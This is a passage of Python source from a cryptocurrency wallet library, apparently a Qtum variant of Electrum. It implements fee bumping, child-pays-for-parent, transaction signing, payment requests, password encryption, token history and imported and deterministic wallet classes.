tx_new = self._bump_fee_through_coinchooser(
tx=tx, new_fee_rate=new_fee_rate, coins=coins)
method_used = 1
except CannotBumpFee:
# method 2: keep all inputs, no new inputs are added,
# allow decreasing and removing outputs (change is decreased first)
# This is less "safe" as it might end up decreasing e.g. a payment to a merchant;
# but e.g. if the user has sent "Max" previously, this is the only way to RBF.
tx_new = self._bump_fee_through_decreasing_outputs(
tx=tx, new_fee_rate=new_fee_rate)
method_used = 2
target_min_fee = new_fee_rate * tx_new.estimated_size()
actual_fee = tx_new.get_fee()
if actual_fee + 1 < target_min_fee:
raise Exception(f"bump_fee fee target was not met (method: {method_used}). "
f"got {actual_fee}, expected >={target_min_fee}. "
f"target rate was {new_fee_rate}")
tx_new.locktime = get_locktime_for_new_transaction(self.network)
return tx_new
def _bump_fee_through_coinchooser(self, *, tx: Transaction, new_fee_rate: Union[int, Decimal],
coins: Sequence[PartialTxInput] = None) -> PartialTransaction:
tx = PartialTransaction.from_tx(tx)
tx.add_info_from_wallet(self)
old_inputs = list(tx.inputs())
old_outputs = list(tx.outputs())
# change address
old_change_addrs = [o.address for o in old_outputs if self.is_change(o.address)]
change_addrs = self.get_change_addresses_for_new_transaction(old_change_addrs)
# which outputs to keep?
if old_change_addrs:
fixed_outputs = list(filter(lambda o: not self.is_change(o.address), old_outputs))
else:
if all(self.is_mine(o.address) for o in old_outputs):
# all outputs are is_mine and none of them are change.
# we bail out as it's unclear what the user would want!
# the coinchooser bump fee method is probably not a good idea in this case
raise CannotBumpFee(_('Cannot bump fee') + ': all outputs are non-change is_mine')
old_not_is_mine = list(filter(lambda o: not self.is_mine(o.address), old_outputs))
if old_not_is_mine:
fixed_outputs = old_not_is_mine
else:
fixed_outputs = old_outputs
if not fixed_outputs:
raise CannotBumpFee(_('Cannot bump fee') + ': could not figure out which outputs to keep')
if coins is None:
coins = self.get_spendable_coins(None)
# make sure we don't try to spend output from the tx-to-be-replaced:
coins = [c for c in coins if c.prevout.txid.hex() != tx.txid()]
for item in coins:
self.add_input_info(item)
def fee_estimator(size):
return self.config.estimate_fee_for_feerate(fee_per_kb=new_fee_rate*1000, size=size)
coin_chooser = coinchooser.get_coin_chooser(self.config)
try:
return coin_chooser.make_tx(coins=coins,
inputs=old_inputs,
outputs=fixed_outputs,
change_addrs=change_addrs,
fee_estimator_vb=fee_estimator,
dust_threshold=self.dust_threshold())
except NotEnoughFunds as e:
raise CannotBumpFee(e)
def _bump_fee_through_decreasing_outputs(self, *, tx: Transaction,
new_fee_rate: Union[int, Decimal]) -> PartialTransaction:
tx = PartialTransaction.from_tx(tx)
tx.add_info_from_wallet(self)
inputs = tx.inputs()
outputs = list(tx.outputs())
# use own outputs
s = list(filter(lambda o: self.is_mine(o.address), outputs))
# ... unless there is none
if not s:
s = outputs
x_fee = run_hook('get_tx_extra_fee', self, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
            s = list(filter(lambda o: o.address != x_fee_address, s))
if not s:
raise CannotBumpFee(_('Cannot bump fee') + ': no outputs at all??')
# prioritize low value outputs, to get rid of dust
s = sorted(s, key=lambda o: o.value)
for o in s:
target_fee = int(round(tx.estimated_size() * new_fee_rate))
delta = target_fee - tx.get_fee()
i = outputs.index(o)
if o.value - delta >= self.dust_threshold():
new_output_value = o.value - delta
assert isinstance(new_output_value, int)
outputs[i].value = new_output_value
delta = 0
break
else:
del outputs[i]
delta -= o.value
# note: delta might be negative now, in which case
# the value of the next output will be increased
if delta > 0:
raise CannotBumpFee(_('Cannot bump fee') + ': ' + _('could not find suitable outputs'))
return PartialTransaction.from_io(inputs, outputs)
def cpfp(self, tx: Transaction, fee: int) -> Optional[PartialTransaction]:
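        # Child-Pays-For-Parent: spend the first output of tx that belongs to us back to one of
        # our addresses, minus fee, giving miners an incentive to confirm the parent as well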
txid = tx.txid()
for i, o in enumerate(tx.outputs()):
address, value = o.address, o.value
if self.is_mine(address):
break
else:
return
coins = self.get_addr_utxo(address)
item = coins.get(TxOutpoint.from_str(txid+':%d'%i))
if not item:
return
self.add_input_info(item)
inputs = [item]
out_address = self.get_unused_address() or address
outputs = [PartialTxOutput.from_address_and_value(out_address, value - fee)]
locktime = get_locktime_for_new_transaction(self.network)
return PartialTransaction.from_io(inputs, outputs, locktime=locktime)
@abstractmethod
def _add_input_sig_info(self, txin: PartialTxInput, address: str, *, only_der_suffix: bool = True) -> None:
pass
def _add_txinout_derivation_info(self, txinout: Union[PartialTxInput, PartialTxOutput],
address: str, *, only_der_suffix: bool = True) -> None:
pass # implemented by subclasses
def _add_input_utxo_info(self, txin: PartialTxInput, address: str) -> None:
if Transaction.is_segwit_input(txin):
if txin.witness_utxo is None:
received, spent = self.get_addr_io(address)
item = received.get(txin.prevout.to_str())
if item:
txin_value = item[1]
txin.witness_utxo = TxOutput.from_address_and_value(address, txin_value)
else: # legacy input
if txin.utxo is None:
# note: for hw wallets, for legacy inputs, ignore_network_issues used to be False
txin.utxo = self.get_input_tx(txin.prevout.txid.hex(), ignore_network_issues=True)
# If there is a NON-WITNESS UTXO, but we know input is segwit, add a WITNESS UTXO, based on it.
# This could have happened if previously another wallet had put a NON-WITNESS UTXO for txin,
# as they did not know if it was segwit. This switch is needed to interop with bitcoin core.
if txin.utxo and Transaction.is_segwit_input(txin):
txin.convert_utxo_to_witness_utxo()
txin.ensure_there_is_only_one_utxo()
def _learn_derivation_path_for_address_from_txinout(self, txinout: Union[PartialTxInput, PartialTxOutput],
address: str) -> bool:
"""Tries to learn the derivation path for an address (potentially beyond gap limit)
using data available in given txin/txout.
Returns whether the address was found to be is_mine.
"""
return False # implemented by subclasses
def add_input_info(self, txin: PartialTxInput, *, only_der_suffix: bool = True) -> None:
address = self.get_txin_address(txin)
if not self.is_mine(address):
is_mine = self._learn_derivation_path_for_address_from_txinout(txin, address)
if not is_mine:
return
# set script_type first, as later checks might rely on it:
txin.script_type = self.get_txin_type(address)
self._add_input_utxo_info(txin, address)
txin.num_sig = self.m if isinstance(self, Multisig_Wallet) else 1
if txin.redeem_script is None:
try:
redeem_script_hex = self.get_redeem_script(address)
txin.redeem_script = bfh(redeem_script_hex) if redeem_script_hex else None
except UnknownTxinType:
pass
if txin.witness_script is None:
try:
witness_script_hex = self.get_witness_script(address)
txin.witness_script = bfh(witness_script_hex) if witness_script_hex else None
except UnknownTxinType:
pass
self._add_input_sig_info(txin, address, only_der_suffix=only_der_suffix)
def can_sign(self, tx: Transaction) -> bool:
if not isinstance(tx, PartialTransaction):
return False
if tx.is_complete():
return False
# add info to inputs if we can; otherwise we might return a false negative:
tx.add_info_from_wallet(self)
for k in self.get_keystores():
if k.can_sign(tx):
return True
return False
def get_input_tx(self, tx_hash, *, ignore_network_issues=False) -> Optional[Transaction]:
# First look up an input transaction in the wallet where it
# will likely be. If co-signing a transaction it may not have
# all the input txs, in which case we ask the network.
tx = self.db.get_transaction(tx_hash)
if not tx and self.network:
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(tx_hash, timeout=10))
except NetworkException as e:
self.logger.info(f'got network error getting input txn. err: {repr(e)}. txid: {tx_hash}. '
f'if you are intentionally offline, consider using the --offline flag')
if not ignore_network_issues:
raise e
else:
tx = Transaction(raw_tx)
return tx
def add_output_info(self, txout: PartialTxOutput, *, only_der_suffix: bool = True) -> None:
address = txout.address
if not self.is_mine(address):
is_mine = self._learn_derivation_path_for_address_from_txinout(txout, address)
if not is_mine:
return
txout.script_type = self.get_txin_type(address)
txout.is_mine = True
txout.is_change = self.is_change(address)
if isinstance(self, Multisig_Wallet):
txout.num_sig = self.m
self._add_txinout_derivation_info(txout, address, only_der_suffix=only_der_suffix)
if txout.redeem_script is None:
try:
redeem_script_hex = self.get_redeem_script(address)
txout.redeem_script = bfh(redeem_script_hex) if redeem_script_hex else None
except UnknownTxinType:
pass
if txout.witness_script is None:
try:
witness_script_hex = self.get_witness_script(address)
txout.witness_script = bfh(witness_script_hex) if witness_script_hex else None
except UnknownTxinType:
pass
def sign_transaction(self, tx: Transaction, password) -> Optional[PartialTransaction]:
if self.is_watching_only():
return
if not isinstance(tx, PartialTransaction):
return
# add info to a temporary tx copy; including xpubs
# and full derivation paths as hw keystores might want them
tmp_tx = copy.deepcopy(tx)
tmp_tx.add_info_from_wallet(self, include_xpubs_and_full_paths=True)
# sign. start with ready keystores.
for k in sorted(self.get_keystores(), key=lambda ks: ks.ready_to_sign(), reverse=True):
try:
if k.can_sign(tmp_tx):
k.sign_transaction(tmp_tx, password)
except UserCancelled:
continue
# remove sensitive info; then copy back details from temporary tx
tmp_tx.remove_xpubs_and_bip32_paths()
tx.combine_with_other_psbt(tmp_tx)
tx.add_info_from_wallet(self, include_xpubs_and_full_paths=False)
return tx
def try_detecting_internal_addresses_corruption(self) -> None:
pass
def check_address(self, addr: str) -> None:
pass
def check_returned_address(func):
def wrapper(self, *args, **kwargs):
addr = func(self, *args, **kwargs)
self.check_address(addr)
return addr
return wrapper
def get_unused_addresses(self) -> Sequence[str]:
domain = self.get_receiving_addresses()
in_use_by_request = [k for k in self.receive_requests.keys() if self.get_request_status(k)[0] != PR_EXPIRED]
return [addr for addr in domain if not self.is_used(addr)
and addr not in in_use_by_request]
@check_returned_address
def get_unused_address(self) -> Optional[str]:
addrs = self.get_unused_addresses()
if addrs:
return addrs[0]
@check_returned_address
def get_receiving_address(self):
# always return an address
domain = self.get_receiving_addresses()
if not domain:
return
choice = domain[0]
for addr in domain:
if not self.is_used(addr):
if addr not in self.receive_requests.keys():
return addr
else:
choice = addr
return choice
def create_new_address(self, for_change: bool = False):
raise Exception("this wallet cannot generate new addresses")
def get_payment_status(self, address, amount):
local_height = self.get_local_height()
received, sent = self.get_addr_io(address)
l = []
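        # collect (confirmations, value) for each output received on this address, then see how
        # many of the most-confirmed outputs are needed to cover the requested amount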
for txo, x in received.items():
h, v, is_cb = x
txid, n = txo.split(':')
info = self.db.get_verified_tx(txid)
if info:
conf = local_height - info.height + 1
else:
conf = 0
l.append((conf, v))
vsum = 0
for conf, v in reversed(sorted(l)):
vsum += v
if vsum >= amount:
return True, conf
return False, None
def get_request_URI(self, addr):
req = self.receive_requests[addr]
message = self.labels.get(addr, '')
amount = req['amount']
extra_query_params = {}
if req.get('time'):
extra_query_params['time'] = str(int(req.get('time')))
if req.get('exp'):
extra_query_params['exp'] = str(int(req.get('exp')))
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
extra_query_params['name'] = req['name']
extra_query_params['sig'] = sig
uri = create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params)
return str(uri)
def get_request_status(self, address):
r = self.receive_requests.get(address)
if r is None:
return PR_UNKNOWN
amount = r.get('amount', 0) or 0
timestamp = r.get('time', 0)
        if timestamp and not isinstance(timestamp, int):
timestamp = 0
exp = r.get('exp', 0) or 0
paid, conf = self.get_payment_status(address, amount)
if not paid:
if exp > 0 and time.time() > timestamp + exp:
status = PR_EXPIRED
else:
status = PR_UNPAID
else:
status = PR_PAID
return status, conf
def get_request(self, key):
req = self.receive_requests.get(key)
if not req:
return
req = copy.copy(req)
_type = req.get('type')
if _type == PR_TYPE_ONCHAIN:
addr = req['address']
req['URI'] = self.get_request_URI(addr)
status, conf = self.get_request_status(addr)
req['status'] = status
if conf is not None:
req['confirmations'] = conf
elif self.lnworker and _type == PR_TYPE_LN:
req['status'] = self.lnworker.get_payment_status(bfh(key))
else:
return
# add URL if we are running a payserver
if self.config.get('run_payserver'):
host = self.config.get('payserver_host', 'localhost')
port = self.config.get('payserver_port', 8002)
root = self.config.get('payserver_root', '/r')
use_ssl = bool(self.config.get('ssl_keyfile'))
protocol = 'https' if use_ssl else 'http'
base = '%s://%s:%d'%(protocol, host, port)
req['view_url'] = base + root + '/pay?id=' + key
if use_ssl and 'URI' in req:
request_url = base + '/bip70/' + key + '.bip70'
req['bip70_url'] = request_url
return req
def receive_tx_callback(self, tx_hash, tx, tx_height):
super().receive_tx_callback(tx_hash, tx, tx_height)
for txo in tx.outputs():
addr = self.get_txout_address(txo)
if addr in self.receive_requests:
status, conf = self.get_request_status(addr)
self.network.trigger_callback('payment_received', self, addr, status)
def make_payment_request(self, addr, amount, message, expiration):
timestamp = int(time.time())
_id = bh2u(sha256d(addr + "%d"%timestamp))[0:10]
        return {
            'type': PR_TYPE_ONCHAIN,
            'time': timestamp,
            'amount': amount,
            'exp': expiration,
            'address': addr,
            'memo': message,
            'id': _id,
            'outputs': [PartialTxOutput.from_address_and_value(addr, amount)],
        }
def sign_payment_request(self, key, alias, alias_addr, password):
req = self.receive_requests.get(key)
alias_privkey = self.export_private_key(alias_addr, password)
pr = paymentrequest.make_unsigned_request(req)
paymentrequest.sign_request_with_alias(pr, alias, alias_privkey)
req['name'] = pr.pki_data
req['sig'] = bh2u(pr.signature)
self.receive_requests[key] = req
self.storage.put('payment_requests', self.receive_requests)
def add_payment_request(self, req):
if req['type'] == PR_TYPE_ONCHAIN:
addr = req['address']
if not bitcoin.is_address(addr):
raise Exception(_('Invalid qtum address.'))
if not self.is_mine(addr):
raise Exception(_('Address not in wallet.'))
key = addr
message = req['memo']
elif req['type'] == PR_TYPE_LN:
key = req['rhash']
message = req['message']
else:
raise Exception('Unknown request type')
amount = req.get('amount')
self.receive_requests[key] = req
self.storage.put('payment_requests', self.receive_requests)
self.set_label(key, message) # should be a default label
return req
def delete_request(self, key):
""" lightning or on-chain """
if key in self.receive_requests:
self.remove_payment_request(key)
elif self.lnworker:
self.lnworker.delete_payment(key)
def delete_invoice(self, key):
""" lightning or on-chain """
if key in self.invoices:
self.invoices.pop(key)
self.storage.put('invoices', self.invoices)
elif self.lnworker:
self.lnworker.delete_payment(key)
def remove_payment_request(self, addr):
if addr not in self.receive_requests:
return False
self.receive_requests.pop(addr)
self.storage.put('payment_requests', self.receive_requests)
return True
def get_sorted_requests(self):
""" sorted by timestamp """
out = [self.get_request(x) for x in self.receive_requests.keys()]
out = [x for x in out if x is not None]
out.sort(key=operator.itemgetter('time'))
return out
@abstractmethod
def get_fingerprint(self):
pass
def can_import_privkey(self):
return False
def can_import_address(self):
return False
def can_delete_address(self):
return False
def has_password(self):
return self.has_keystore_encryption() or self.has_storage_encryption()
def can_have_keystore_encryption(self):
return self.keystore and self.keystore.may_have_password()
def get_available_storage_encryption_version(self) -> StorageEncryptionVersion:
"""Returns the type of storage encryption offered to the user.
A wallet file (storage) is either encrypted with this version
or is stored in plaintext.
"""
if isinstance(self.keystore, Hardware_KeyStore):
return StorageEncryptionVersion.XPUB_PASSWORD
else:
return StorageEncryptionVersion.USER_PASSWORD
def has_keystore_encryption(self):
"""Returns whether encryption is enabled for the keystore.
If True, e.g. signing a transaction will require a password.
"""
if self.can_have_keystore_encryption():
return self.storage.get('use_encryption', False)
return False
def has_storage_encryption(self):
"""Returns whether encryption is enabled for the wallet file on disk."""
return self.storage.is_encrypted()
@classmethod
def may_have_password(cls):
return True
def check_password(self, password):
if self.has_keystore_encryption():
self.keystore.check_password(password)
self.storage.check_password(password)
def update_password(self, old_pw, new_pw, *, encrypt_storage: bool = True):
if old_pw is None and self.has_password():
raise InvalidPassword()
self.check_password(old_pw)
if encrypt_storage:
enc_version = self.get_available_storage_encryption_version()
else:
enc_version = StorageEncryptionVersion.PLAINTEXT
self.storage.set_password(new_pw, enc_version)
# note: Encrypting storage with a hw device is currently only
# allowed for non-multisig wallets. Further,
# Hardware_KeyStore.may_have_password() == False.
# If these were not the case,
# extra care would need to be taken when encrypting keystores.
self._update_password_for_keystore(old_pw, new_pw)
encrypt_keystore = self.can_have_keystore_encryption()
self.storage.set_keystore_encryption(bool(new_pw) and encrypt_keystore)
self.storage.write()
@abstractmethod
def _update_password_for_keystore(self, old_pw: Optional[str], new_pw: Optional[str]) -> None:
pass
def sign_message(self, address, message, password):
index = self.get_address_index(address)
return self.keystore.sign_message(index, message, password)
def decrypt_message(self, pubkey: str, message, password) -> bytes:
addr = self.pubkeys_to_address([pubkey])
index = self.get_address_index(addr)
return self.keystore.decrypt_message(index, message, password)
@abstractmethod
def pubkeys_to_address(self, pubkeys: Sequence[str]) -> Optional[str]:
pass
def txin_value(self, txin: TxInput) -> Optional[int]:
if isinstance(txin, PartialTxInput):
v = txin.value_sats()
if v: return v
txid = txin.prevout.txid.hex()
prev_n = txin.prevout.out_idx
for addr in self.db.get_txo_addresses(txid):
d = self.db.get_txo_addr(txid, addr)
for n, v, cb in d:
if n == prev_n:
return v
# may occur if wallet is not synchronized
return None
def price_at_timestamp(self, txid, price_func):
"""Returns fiat price of bitcoin at the time tx got confirmed."""
timestamp = self.get_tx_height(txid).timestamp
return price_func(timestamp if timestamp else time.time())
def unrealized_gains(self, domain, price_func, ccy):
coins = self.get_utxos(domain)
now = time.time()
p = price_func(now)
ap = sum(self.coin_price(coin.prevout.txid.hex(), price_func, ccy, self.txin_value(coin)) for coin in coins)
lp = sum([coin.value_sats() for coin in coins]) * p / Decimal(COIN)
return lp - ap
def average_price(self, txid, price_func, ccy):
""" Average acquisition price of the inputs of a transaction """
input_value = 0
total_price = 0
for addr in self.db.get_txi_addresses(txid):
d = self.db.get_txi_addr(txid, addr)
for ser, v in d:
input_value += v
total_price += self.coin_price(ser.split(':')[0], price_func, ccy, v)
return total_price / (input_value/Decimal(COIN))
def clear_coin_price_cache(self):
self._coin_price_cache = {}
def coin_price(self, txid, price_func, ccy, txin_value):
"""
Acquisition price of a coin.
This assumes that either all inputs are mine, or no input is mine.
"""
if txin_value is None:
return Decimal('NaN')
cache_key = "{}:{}:{}".format(str(txid), str(ccy), str(txin_value))
result = self._coin_price_cache.get(cache_key, None)
if result is not None:
return result
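        # if the tx spends our own coins, price them at the average acquisition price of its
        # inputs; otherwise use the user-set fiat value, or the exchange rate at confirmation time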
if self.db.get_txi_addresses(txid):
result = self.average_price(txid, price_func, ccy) * txin_value/Decimal(COIN)
self._coin_price_cache[cache_key] = result
return result
else:
fiat_value = self.get_fiat_value(txid, ccy)
if fiat_value is not None:
return fiat_value
else:
p = self.price_at_timestamp(txid, price_func)
return p * txin_value/Decimal(COIN)
def is_billing_address(self, addr):
# overridden for TrustedCoin wallets
return False
@abstractmethod
def is_watching_only(self) -> bool:
pass
def get_keystore(self) -> Optional[KeyStore]:
return self.keystore
def get_keystores(self) -> Sequence[KeyStore]:
return [self.keystore] if self.keystore else []
@profiler
def get_full_token_history(self, contract_addr=None, bind_addr=None) -> list:
hist = []
keys = []
for token_key in self.db.list_tokens():
if contract_addr and contract_addr in token_key \
or bind_addr and bind_addr in token_key \
or not bind_addr and not contract_addr:
keys.append(token_key)
for key in keys:
contract_addr, bind_addr = key.split('_')
for txid, height, log_index in self.db.get_token_history(key):
status = self.get_tx_height(txid)
height, conf, timestamp = status.height, status.conf, status.timestamp
for call_index, contract_call in enumerate(self.db.get_tx_receipt(txid)):
logs = contract_call.get('log', [])
if len(logs) > log_index:
log = logs[log_index]
                        # check contract address
if contract_addr != log.get('address', ''):
self.logger.info("contract address mismatch")
continue
# check topic name
topics = log.get('topics', [])
if len(topics) < 3:
self.logger.info("not enough topics")
continue
if topics[0] != TOKEN_TRANSFER_TOPIC:
self.logger.info("topic mismatch")
continue
# check user bind address
_, hash160b = b58_address_to_hash160(bind_addr)
hash160 = bh2u(hash160b).zfill(64)
if hash160 not in topics:
self.logger.info("address mismatch")
continue
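                        # QRC20 Transfer(address,address,uint256): 'data' holds the token amount;
                        # topics[1]/topics[2] are the zero-padded from/to hash160s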
amount = int(log.get('data'), 16)
from_addr = hash160_to_p2pkh(binascii.a2b_hex(topics[1][-40:]))
to_addr = hash160_to_p2pkh(binascii.a2b_hex(topics[2][-40:]))
item = {
'from_addr': from_addr,
'to_addr': to_addr,
'bind_addr': self.db.get_token(key).bind_addr,
'amount': amount,
'token_key': key,
'txid': txid,
'height': height,
'txpos_in_block': 0,
'confirmations': conf,
'timestamp': timestamp,
'date': timestamp_to_datetime(timestamp),
'call_index': call_index,
'log_index': log_index,
}
hist.append(item)
else:
continue
return hist
@abstractmethod
def save_keystore(self):
pass
@abstractmethod
def has_seed(self) -> bool:
pass
@abstractmethod
def is_beyond_limit(self, address: str) -> bool:
pass
class Simple_Wallet(Abstract_Wallet):
# wallet with a single keystore
def is_watching_only(self):
return self.keystore.is_watching_only()
def _update_password_for_keystore(self, old_pw, new_pw):
if self.keystore and self.keystore.may_have_password():
self.keystore.update_password(old_pw, new_pw)
self.save_keystore()
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
@abstractmethod
def get_public_key(self, address: str) -> Optional[str]:
pass
def get_public_keys(self, address: str) -> Sequence[str]:
return [self.get_public_key(address)]
def get_redeem_script(self, address: str) -> Optional[str]:
txin_type = self.get_txin_type(address)
if txin_type in ('p2pkh', 'p2wpkh', 'p2pk'):
return None
if txin_type == 'p2wpkh-p2sh':
pubkey = self.get_public_key(address)
return bitcoin.p2wpkh_nested_script(pubkey)
if txin_type == 'address':
return None
raise UnknownTxinType(f'unexpected txin_type {txin_type}')
def get_witness_script(self, address: str) -> Optional[str]:
return None
class Imported_Wallet(Simple_Wallet):
# wallet made of imported addresses
wallet_type = 'imported'
txin_type = 'address'
def __init__(self, storage, *, config):
Abstract_Wallet.__init__(self, storage, config=config)
def is_watching_only(self):
return self.keystore is None
def can_import_privkey(self):
return bool(self.keystore)
def load_keystore(self):
self.keystore = load_keystore(self.storage, 'keystore') if self.storage.get('keystore') else None
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
def can_import_address(self):
return self.is_watching_only()
def can_delete_address(self):
return True
def has_seed(self):
return False
def is_deterministic(self):
return False
def is_change(self, address):
return False
def is_beyond_limit(self, address):
return False
def get_fingerprint(self):
return ''
def get_addresses(self):
# note: overridden so that the history can be cleared
return self.db.get_imported_addresses()
def get_receiving_addresses(self, **kwargs):
return self.get_addresses()
def get_change_addresses(self, **kwargs):
return []
def import_addresses(self, addresses: List[str], *,
write_to_disk=True) -> Tuple[List[str], List[Tuple[str, str]]]:
good_addr = [] # type: List[str]
bad_addr = [] # type: List[Tuple[str, str]]
for address in addresses:
if not bitcoin.is_address(address):
bad_addr.append((address, _('invalid address')))
continue
if self.db.has_imported_address(address):
bad_addr.append((address, _('address already in wallet')))
continue
good_addr.append(address)
self.db.add_imported_address(address, {})
self.add_address(address)
if write_to_disk:
self.storage.write()
return good_addr, bad_addr
def import_address(self, address: str) -> str:
good_addr, bad_addr = self.import_addresses([address])
if good_addr and good_addr[0] == address:
return address
else:
raise BitcoinException(str(bad_addr[0][1]))
def delete_address(self, address):
if not self.db.has_imported_address(address):
return
transactions_to_remove = set() # only referred to by this address
transactions_new = set() # txs that are not only referred to by address
with self.lock:
for addr in self.db.get_history():
details = self.get_address_history(addr)
if addr == address:
for tx_hash, height in details:
transactions_to_remove.add(tx_hash)
else:
for tx_hash, height in details:
transactions_new.add(tx_hash)
transactions_to_remove -= transactions_new
self.db.remove_addr_history(address)
for tx_hash in transactions_to_remove:
self.remove_transaction(tx_hash)
self.set_label(address, None)
self.remove_payment_request(address)
self.set_frozen_state_of_addresses([address], False)
pubkey = self.get_public_key(address)
self.db.remove_imported_address(address)
if pubkey:
# delete key iff no other address uses it (e.g. p2pkh and p2wpkh for same key)
for txin_type in bitcoin.WIF_SCRIPT_TYPES.keys():
try:
addr2 = bitcoin.pubkey_to_address(txin_type, pubkey)
except NotImplementedError:
pass
else:
if self.db.has_imported_address(addr2):
break
else:
self.keystore.delete_imported_key(pubkey)
self.save_keystore()
self.storage.write()
def is_mine(self, address) -> bool:
return self.db.has_imported_address(address)
def get_address_index(self, address) -> Optional[str]:
# returns None if address is not mine
return self.get_public_key(address)
def get_public_key(self, address) -> Optional[str]:
x = self.db.get_imported_address(address)
return x.get('pubkey') if x else None
def import_private_keys(self, keys: List[str], password: Optional[str], *,
write_to_disk=True) -> Tuple[List[str], List[Tuple[str, str]]]:
good_addr = [] # type: List[str]
bad_keys = [] # type: List[Tuple[str, str]]
for key in keys:
try:
txin_type, pubkey = self.keystore.import_privkey(key, password)
except Exception as e:
bad_keys.append((key, _('invalid private key') + f': {e}'))
continue
if txin_type not in ('p2pkh', 'p2wpkh', 'p2wpkh-p2sh'):
bad_keys.append((key, _('not implemented type') + f': {txin_type}'))
continue
addr = bitcoin.pubkey_to_address(txin_type, pubkey)
good_addr.append(addr)
self.db.add_imported_address(addr, {'type':txin_type, 'pubkey':pubkey})
self.add_address(addr)
self.save_keystore()
if write_to_disk:
self.storage.write()
return good_addr, bad_keys
def import_private_key(self, key: str, password: Optional[str]) -> str:
good_addr, bad_keys = self.import_private_keys([key], password=password)
if good_addr:
return good_addr[0]
else:
raise BitcoinException(str(bad_keys[0][1]))
def get_txin_type(self, address):
return self.db.get_imported_address(address).get('type', 'address')
def _add_input_sig_info(self, txin, address, *, only_der_suffix=True):
if not self.is_mine(address):
return
if txin.script_type in ('unknown', 'address'):
return
elif txin.script_type in ('p2pkh', 'p2wpkh', 'p2wpkh-p2sh'):
pubkey = self.get_public_key(address)
if not pubkey:
return
txin.pubkeys = [bfh(pubkey)]
else:
raise Exception(f'Unexpected script type: {txin.script_type}. '
f'Imported wallets are not implemented to handle this.')
def pubkeys_to_address(self, pubkeys):
pubkey = pubkeys[0]
for addr in self.db.get_imported_addresses(): # FIXME slow...
if self.db.get_imported_address(addr)['pubkey'] == pubkey:
return addr
return None
def decrypt_message(self, pubkey: str, message, password) -> bytes:
# this is significantly faster than the implementation in the superclass
return self.keystore.decrypt_message(pubkey, message, password)
class Deterministic_Wallet(Abstract_Wallet):
def __init__(self, storage, *, config):
self._ephemeral_addr_to_addr_index = {} # type: Dict[str, Sequence[int]]
Abstract_Wallet.__init__(self, storage, config=config)
self.gap_limit = storage.get('gap_limit', 20)
# generate addresses now. note that without libsecp this might block
# for a few seconds!
self.synchronize()
def has_seed(self):
return self.keystore.has_seed()
def get_addresses(self):
# note: overridden so that the history can be cleared.
# addresses are ordered based on derivation
out = self.get_receiving_addresses()
out += self.get_change_addresses()
return out
def get_receiving_addresses(self, *, slice_start=None, slice_stop=None):
return self.db.get_receiving_addresses(slice_start=slice_start, slice_stop=slice_stop)
def get_change_addresses(self, *, slice_start=None, slice_stop=None):
return self.db.get_change_addresses(slice_start=slice_start, slice_stop=slice_stop)
@profiler
def try_detecting_internal_addresses_corruption(self):
if not is_using_fast_ecc():
self.logger.info("internal address corruption test skipped due to missing libsecp256k1")
return
addresses_all = self.get_addresses()
# sample 1: first few
addresses_sample1 = addresses_all[:10]
# sample2: a few more randomly selected
addresses_rand = addresses_all[10:]
addresses_sample2 = random.sample(addresses_rand, min(len(addresses_rand), 10))
for addr_found in itertools.chain(addresses_sample1, addresses_sample2):
self.check_address(addr_found)
def check_address(self, addr):
if addr and self.is_mine(addr):
if addr != self.derive_address(*self.get_address_index(addr)):
raise InternalAddressCorruption()
def get_seed(self, password):
return self.keystore.get_seed(password)
def change_gap_limit(self, value):
'''This method is not called in the code, it is kept for console use'''
if value >= self.min_acceptable_gap():
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
self.storage.write()
return True
else:
return False
def num_unused_trailing_addresses(self, addresses):
k = 0
for addr in addresses[::-1]:
if self.db.get_addr_history(addr):
break
k += 1
return k
def min_acceptable_gap(self):
# fixme: this assumes wallet is synchronized
n = 0
nmax = 0
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
for addr in addresses[0:-k]:
if self.db.get_addr_history(addr):
n = 0
else:
n += 1
nmax = max(nmax, n)
return nmax + 1
@abstractmethod
def derive_pubkeys(self, c: int, i: int) -> Sequence[str]:
pass
def derive_address(self, for_change: int, n: int) -> str:
for_change = int(for_change)
pubkeys = self.derive_pubkeys(for_change, n)
return self.pubkeys_to_address(pubkeys)
def get_public_keys_with_deriv_info(self, address: str):
der_suffix = self.get_address_index(address)
der_suffix = [int(x) for x in der_suffix]
return {k.derive_pubkey(*der_suffix): (k, der_suffix)
for k in self.get_keystores()}
def _add_input_sig_info(self, txin, address, *, only_der_suffix=True):
self._add_txinout_derivation_info(txin, address, only_der_suffix=only_der_suffix)
def _add_txinout_derivation_info(self, txinout, address, *, only_der_suffix=True):
if not self.is_mine(address):
return
pubkey_deriv_info = self.get_public_keys_with_deriv_info(address)
txinout.pubkeys = sorted([pk for pk in list(pubkey_deriv_info)])
for pubkey in pubkey_deriv_info:
ks, der_suffix = pubkey_deriv_info[pubkey]
fp_bytes, der_full = ks.get_fp_and_derivation_to_be_used_in_partial_tx(der_suffix,
only_der_suffix=only_der_suffix)
txinout.bip32_paths[pubkey] = (fp_bytes, der_full)
def create_new_address(self, for_change: bool = False):
assert type(for_change) is bool
with self.lock:
n = self.db.num_change_addresses() if for_change else self.db.num_receiving_addresses()
address = self.derive_address(int(for_change), n)
self.db.add_change_address(address) if for_change else self.db.add_receiving_address(address)
self.add_address(address)
if for_change:
# note: if it's actually used, it will get filtered later
self._unused_change_addresses.append(address)
return address
def synchronize_sequence(self, for_change):
limit = self.gap_limit_for_change if for_change else self.gap_limit
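        # keep deriving addresses until the trailing 'limit' addresses have no deeply
        # confirmed history (the usual gap-limit rule)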
while True:
num_addr = self.db.num_change_addresses() if for_change else self.db.num_receiving_addresses()
if num_addr < limit:
self.create_new_address(for_change)
continue
if for_change:
last_few_addresses = self.get_change_addresses(slice_start=-limit)
else:
last_few_addresses = self.get_receiving_addresses(slice_start=-limit)
if any(map(self.address_is_old, last_few_addresses)):
self.create_new_address(for_change)
else:
break
@AddressSynchronizer.with_local_height_cached
def synchronize(self):
with self.lock:
self.synchronize_sequence(False)
self.synchronize_sequence(True)
def is_beyond_limit(self, address):
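        # an address is beyond the gap limit if none of the 'limit' addresses derived
        # just before it have any history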
is_change, i = self.get_address_index(address)
